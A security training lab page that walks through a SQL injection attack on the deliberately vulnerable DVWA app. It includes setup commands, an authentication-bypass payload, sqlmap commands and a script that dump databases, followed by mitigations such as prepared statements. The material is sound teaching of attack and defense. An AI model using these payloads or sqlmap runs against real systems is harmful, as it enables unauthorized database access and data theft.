Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 56: Conducting a SQL Injection Attack

by | Jun 30, 2025 | 0 comments

Objective

Simulate a SQL Injection (SQLi) attack to exploit vulnerable web applications and retrieve sensitive data. Understand how SQLi works, document the attack steps, and implement prevention techniques to mitigate this critical vulnerability.

Scenario

SQL Injection is one of the most severe web application vulnerabilities, allowing attackers to manipulate SQL queries to gain unauthorized access to databases. In this exercise, you’ll exploit a vulnerable web application, extract sensitive data, and apply secure coding practices to prevent such attacks.

⚠️ Important: This exercise must be conducted in a legal and controlled environment using intentionally vulnerable applications (e.g., DVWA or WebGoat). Unauthorized attacks are illegal and unethical.

Lab Instructions

Step 1: Set Up a Vulnerable Web Application

a. Install DVWA (Damn Vulnerable Web Application)

sudo apt update
sudo apt install apache2 mysql-server php php-mysqli php-gd php-curl -y
sudo git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa
sudo chown -R www-data:www-data /var/www/html/dvwa
sudo systemctl restart apache2

b. Configure the Database

sudo mysql -u root -p

CREATE DATABASE dvwa;
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
FLUSH PRIVILEGES;
EXIT;
  • Edit config.inc.php in DVWA:
sudo nano /var/www/html/dvwa/config/config.inc.php
  • Set database credentials:
$_DVWA[ 'db_user' ] = 'dvwa';
$_DVWA[ 'db_password' ] = 'p@ssw0rd';

Step 2: Perform SQL Injection Attack

a. Access the DVWA Login Page

  • URL: http://<server-ip>/dvwa/login.php
  • Set DVWA security level to Low (via DVWA’s security settings).

b. Manual SQL Injection

  • Use the following payload in the Username field:
admin' OR '1'='1' --
  • Expected Result: Bypasses authentication and grants access to the application.

c. Use sqlmap for Automated SQL Injection

  • Install sqlmap:
sudo apt install sqlmap -y
  • Run sqlmap against the login form:
sqlmap -u "http://<server-ip>/dvwa/vulnerable_page.php?id=1" --dbs --batch
  • Expected Result: sqlmap extracts database names, tables, and sensitive data.

Step 3: Document the Attack Process

  1. Target Identification: Vulnerable login page detected.
  2. Payload Injection: SQL payload bypasses authentication.
  3. Data Extraction: sqlmap automates database data retrieval.

Step 4: Implement SQL Injection Mitigation

  1. Prepared Statements (Parameterized Queries):
    • Use parameterized queries to prevent SQL injection.
    • Example (PHP with MySQLi): $stmt = $conn->prepare("SELECT * FROM users WHERE username = ? AND password = ?"); $stmt->bind_param("ss", $username, $password); $stmt->execute();
  2. Input Validation:
    • Sanitize user inputs to filter malicious characters.
    • Example (PHP): $username = filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING);
  3. Use ORM (Object-Relational Mapping):
    • ORM frameworks prevent raw SQL execution.
  4. Least Privilege Principle:
    • Restrict database user permissions.
  5. Error Handling:
    • Avoid exposing database errors to users.

Solution & Explanation

How SQL Injection Works

  • SQL injection exploits insecure SQL queries by injecting malicious SQL code.
  • Example: SELECT * FROM users WHERE username = '$username' AND password = '$password';
  • Inputting ' OR '1'='1 alters the query to: SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
  • Result: Grants unauthorized access.

Impact of SQL Injection

  1. Unauthorized Data Access: Exposes sensitive data.
  2. Authentication Bypass: Allows login without valid credentials.
  3. Data Manipulation: Enables data deletion or modification.
  4. Remote Code Execution: Severe SQLi can lead to RCE.

Prevention Techniques

  • Prepared Statements: Prevent SQL code manipulation.
  • Input Validation: Filters malicious inputs.
  • Database User Restrictions: Minimizes damage if compromised.

Testing & Verification

  1. Before Mitigation: SQL injection payloads succeed in bypassing authentication.
  2. After Mitigation: SQL injection attempts are blocked.

Verify Mitigation with sqlmap

sqlmap -u "http://<server-ip>/dvwa/vulnerable_page.php?id=1" --batch
  • Expected Result: sqlmap fails to extract data due to prepared statements.

Security Best Practices

  1. Always Use Prepared Statements.
  2. Validate and Sanitize All User Inputs.
  3. Apply the Least Privilege Principle for Database Access.
  4. Regularly Audit and Patch Web Applications.
  5. Implement Web Application Firewalls (WAFs).

Additional Script (Optional)

Automate SQL Injection Detection:

#!/bin/bash
# Simple SQL Injection Detection Script
URL=$1
sqlmap -u "$URL" --batch --risk=3 --level=5

Run the script:

chmod +x sql_injection_test.sh
./sql_injection_test.sh "http://<server-ip>/dvwa/vulnerable_page.php?id=1"

Conclusion

In this exercise, you successfully exploited a vulnerable web application using SQL Injection, retrieved sensitive data, and implemented prevention techniques like prepared statements and input validation. Mitigating SQL injection vulnerabilities is critical to safeguarding web applications and protecting sensitive data.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *